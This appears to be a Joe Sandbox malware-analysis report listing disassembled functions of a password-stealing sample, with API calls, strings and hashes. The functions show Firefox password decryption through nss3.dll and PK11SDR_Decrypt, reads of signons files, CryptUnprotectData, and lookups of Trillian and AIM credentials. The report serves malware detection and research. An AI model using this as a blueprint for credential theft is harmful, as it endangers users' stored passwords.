                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                                                      Function 0040796E Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040799A
                                                                                                                                                                                                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                        • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                                                        • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                      • free.MSVCRT ref: 004079BD
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3669619086-0
                                                                                                                                                                                                                      • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                                                      • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 00407898 Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004078FC
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407904
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 379999529-0
                                                                                                                                                                                                                      • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                                                                                                      • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755
                                                                                                                                                                                                                      Function 00407C79 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 97 407c79-407dc2 memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 98 407dc4 97->98 99 407df8-407dfb 97->99 100 407dca-407dd3 98->100 101 407e2c-407e30 99->101 102 407dfd-407e06 99->102 103 407dd5-407dd9 100->103 104 407dda-407df6 100->104 105 407e08-407e0c 102->105 106 407e0d-407e2a 102->106 103->104 104->99 104->100 105->106 106->101 106->102
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407CDB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407CEF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407D09
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407D1E
                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407D91
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407DA0
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                      • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                      • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                      • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                                                      • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5
                                                                                                                                                                                                                      Function 00410C4C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 93stringlibraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 107 410c4c-410c87 memset call 405ec5 110 410d64-410d6e 107->110 111 410c8d-410cda GetCurrentDirectoryA SetCurrentDirectoryA memset strlen * 2 107->111 112 410cf9-410cfb 111->112 113 410cdc-410cf7 call 406b4b 111->113 115 410d01-410d15 LoadLibraryExA 112->115 113->115 115->110 117 410d17-410d61 115->117 117->110
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: _mbscpy.MSVCRT(?,?), ref: 0040607A
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                                                                                                                                                                                        • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                                                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                                                        • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                                                                                                                                                                                        • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                                                                                                                                                                                                      • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                                                                                      • API String ID: 2734314261-3659000792
                                                                                                                                                                                                                      • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                                                                                                      • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54
                                                                                                                                                                                                                      Function 004064FB Relevance: 19.7, APIs: 10, Strings: 3, Instructions: 158stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 124 4064fb-40651b call 410c4c 127 406521-406555 memset call 406958 124->127 128 4066d9-4066e0 124->128 131 406563 127->131 132 406557-406561 127->132 133 406566-406568 131->133 132->133 135 4066d4 call 410d6f 133->135 136 40656e-4065d3 memset * 3 strlen * 2 133->136 135->128 137 4065d5-4065e6 call 406b4b 136->137 138 4065e8 136->138 141 4065ef-40660c strlen * 2 137->141 138->141 143 406621 141->143 144 40660e-40661f call 406b4b 141->144 146 406628-406645 strlen * 2 143->146 144->146 148 406647-406658 call 406b4b 146->148 149 40665a 146->149 151 406661-406670 call 4069d3 148->151 149->151 155 406681-406690 call 4069d3 151->155 156 406672-40667c call 4062db 151->156 160 4066a1-4066b0 call 4069d3 155->160 161 406692-40669c call 4062db 155->161 156->155 165 4066c1-4066d0 160->165 166 4066b2-4066bc call 4062db 160->166 161->160 165->135 168 4066d2 165->168 166->165 168->135
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                                                        • Part of subcall function 00410C4C: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406537
                                                                                                                                                                                                                        • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                                                                                                                                        • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040657E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406596
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004065AE
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004065B9
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004065C7
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004065F2
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406600
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040662B
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406639
                                                                                                                                                                                                                        • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                                                                                                        • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                                                                                                                                                                                                        • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                                                                                                                                                                                                        • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                                                                                                                                                                                                        • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                                                                                                                                                                                                        • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                                                                                                                                                                                                        • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                                                                                                                                                                                                        • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT(?), ref: 004064E5
                                                                                                                                                                                                                        • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetstrlen$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                                                                                                                                                                                                      • String ID: signons.txt$signons2.txt$signons3.txt
                                                                                                                                                                                                                      • API String ID: 467111709-561706229
                                                                                                                                                                                                                      • Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                                                                                                                                      • Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58
                                                                                                                                                                                                                      Function 00404D7A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 394 404d7a-404da3 LoadLibraryA 395 404da5-404db3 394->395 396 404dcd-404dd5 394->396 400 404db5-404db9 395->400 401 404dbe-404dc7 FreeLibrary 395->401 399 404dd6-404ddb 396->399 403 404df4-404df8 399->403 404 404ddd-404df3 MessageBoxA 399->404 405 404dbc 400->405 401->396 402 404dc9-404dcb 401->402 402->399 405->401
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                                                                                                                                                                                                      • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoadMessage
                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                      • API String ID: 3897320386-317687271
                                                                                                                                                                                                                      • Opcode ID: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                                                                                                                                                                                                      • Instruction ID: eec6f3f66ef6417fb43289990c32370c6d67362bb519490399a3c202bd773795
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6701D671751615ABD3215BA09C49BEB3EA8DFC9749B118139E206F2180DFB8CA09829C
                                                                                                                                                                                                                      Function 0040FC4F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FC6B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FC82
                                                                                                                                                                                                                        • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                                                                                                                                                                                        • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                                                                                                                                                                                        • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040FCAD
                                                                                                                                                                                                                        • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                                                                                                                                                                                                        • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                                                                                                                                                                                        • Part of subcall function 0041223F: _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040FCD5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
                                                                                                                                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                      • API String ID: 748118687-1174173950
                                                                                                                                                                                                                      • Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                                                                                                                                                                                                      • Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9
                                                                                                                                                                                                                      Function 0041212C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 00412188
                                                                                                                                                                                                                        • Part of subcall function 00411D82: RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137
                                                                                                                                                                                                                      • :\Program Files, xrefs: 0041217E
                                                                                                                                                                                                                      • ProgramFilesDir, xrefs: 00412150
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseDirectoryOpenQueryValueWindows_mbscat
                                                                                                                                                                                                                      • String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                                                      • API String ID: 3464146404-1099425022
                                                                                                                                                                                                                      • Opcode ID: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                                                                                                                                                                                                      • Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D
                                                                                                                                                                                                                      Function 00411C8F Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00411CB8
                                                                                                                                                                                                                        • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                                                                                                                                                                                                        • Part of subcall function 00406F2D: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00406F78
                                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00411CF4
                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3143880245-0
                                                                                                                                                                                                                      • Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                                                                                                                                      • Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8
                                                                                                                                                                                                                      Function 0041208B Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004120C4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                      • Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                                                                                                                                      • Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC
                                                                                                                                                                                                                      Function 00404C9D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoad
                                                                                                                                                                                                                      • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                                                                      • API String ID: 534179979-1827663648
                                                                                                                                                                                                                      • Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                                                                                                                                      • Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798
                                                                                                                                                                                                                      Function 0040D935 Relevance: 4.5, APIs: 3, Instructions: 46COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D959
                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
                                                                                                                                                                                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989
                                                                                                                                                                                                                        • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                        • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                                                                                                                                                                                                        • Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                                                                                                                                                                                                        • Part of subcall function 0040D794: atoi.MSVCRT(?), ref: 0040D840
                                                                                                                                                                                                                        • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
                                                                                                                                                                                                                        • Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?), ref: 0040D8B3
                                                                                                                                                                                                                        • Part of subcall function 0040D794: _mbscpy.MSVCRT(?,?,?,?), ref: 0040D8C6
                                                                                                                                                                                                                        • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
